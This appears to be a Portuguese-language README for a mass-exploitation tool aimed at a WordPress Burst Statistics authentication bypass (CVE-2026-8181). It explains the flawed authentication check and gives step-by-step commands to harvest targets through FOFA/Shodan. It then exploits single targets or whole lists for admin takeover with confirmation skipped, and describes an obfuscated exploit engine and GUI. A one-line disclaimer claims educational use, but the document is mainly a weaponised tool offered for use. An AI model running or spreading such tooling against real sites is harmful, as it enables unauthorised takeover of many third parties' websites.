
CVE-2026-8181 — Bypass de autenticação do plugin WordPress Burst Statistics (CVSS 9.8) para assumir conta de administrador. Scanner em massa com integração FOFA/Shodan e GUI moderna.
CVSS 9.8 (Crítico) — Bypass de autenticação para assumir conta de administrador
CVE-2026-8181 é uma vulnerabilidade de Bypass de Autenticação no plugin WordPress Burst Statistics versões 3.4.0 a 3.4.1.1. Este plugin é usado por mais de 200.000 sites WordPress como uma alternativa de analytics amigável à privacidade ao Google Analytics.
Esta vulnerabilidade permite que um atacante não autenticado que conheça o nome de usuário do admin:
A função is_mainwp_authenticated() em class-mainwp-proxy.php valida incorretamente o valor de retorno de wp_authenticate_application_password(). Essa função retorna null (em vez de WP_Error) quando chamada fora do contexto da REST API, e o código apenas verifica is_wp_error(). Como null não é WP_Error, a autenticação é considerada bem-sucedida.
# 1. Clone repository
git clone https://github.com/YOUR_USERNAME/CVE-2026-8181.git
cd CVE-2026-8181
# 2. Install dependencies
py -3.11 -m pip install -r requirements.txt
# 3. Siapkan .env (untuk scan via FOFA / Shodan)
echo [email protected] > .env
echo FOFA_KEY=your_fofa_key >> .env
echo SHODAN_KEY=your_shodan_key >> .env
# 4. Jalankan (pilih salah satu):
# Modern GUI (recommended)
py -3.11 gui_modern.py
# Atau double-click run.bat
run.bat
# Atau CLI langsung exploit satu target
py -3.11 CVE-2026-8181.py -t https://target.com -u admin --no-confirm
# Atau exploit massal dari file
py -3.11 CVE-2026-8181.py -l targets_output.txt -u admin --no-confirm
# Atau scan target dulu, baru exploit
py -3.11 finder.py --file list.txt
py -3.11 CVE-2026-8181.py -l targets_output.txt -u admin --no-confirm
Clique duas vezes em run.bat ou execute:
py -3.11 gui_modern.py

Visual da GUI moderna do CVE-2026-8181 com 3 abas
Na aba Scan: escolha a fonte dos alvos (FOFA/Shodan do .env, arquivo ou manual) → clique em SCAN TARGETS Na aba Exploit: insira o nome de usuário do admin → clique em EXPLOIT

A ferramenta encontrou alvos vulneráveis e prontos para exploit
Se o exploit for bem-sucedido, o atacante obtém acesso total como administrador:

Painel do WordPress admin após exploração bem-sucedida
CVE-2026-8181/
├── CVE-2026-8181.py # Main exploit engine (PyArmor)
├── gui_modern.py # Modern GUI wrapper (recommended)
├── finder.py # Target scanner (FOFA / Shodan / File)
├── run.bat # One-click launcher
├── requirements.txt # Python dependencies
├── .env # API keys (gitignored)
├── .gitignore
├── Dork.txt # Google Dork
├── pyarmor_runtime_000000/ # PyArmor runtime (Python 3.11)
├── system/ # Source modules (obfuscated)
└── img/ # Screenshots tutorial
├── 1.png
├── 2.png
└── 3.png
.env.envApenas para fins educacionais e testes de penetração autorizados. O uso sem permissão em sistemas que não são seus é ilegal. Use somente em sites que você possui ou para os quais tenha autorização por escrito.
| Flag | Descrição |
|---|
-t, --target | URL do alvo (único) |
-l, --list | Arquivo contendo a lista de alvos |
-u, --username | Nome de usuário do admin (padrão: admin) |
-T, --threads | Número de threads (padrão: 10) |
-o, --output | Arquivo de saída com os resultados |
-v, --verbose | Saída de depuração |
--timeout | Tempo limite da requisição (segundos) |
--no-confirm | Pular confirmação |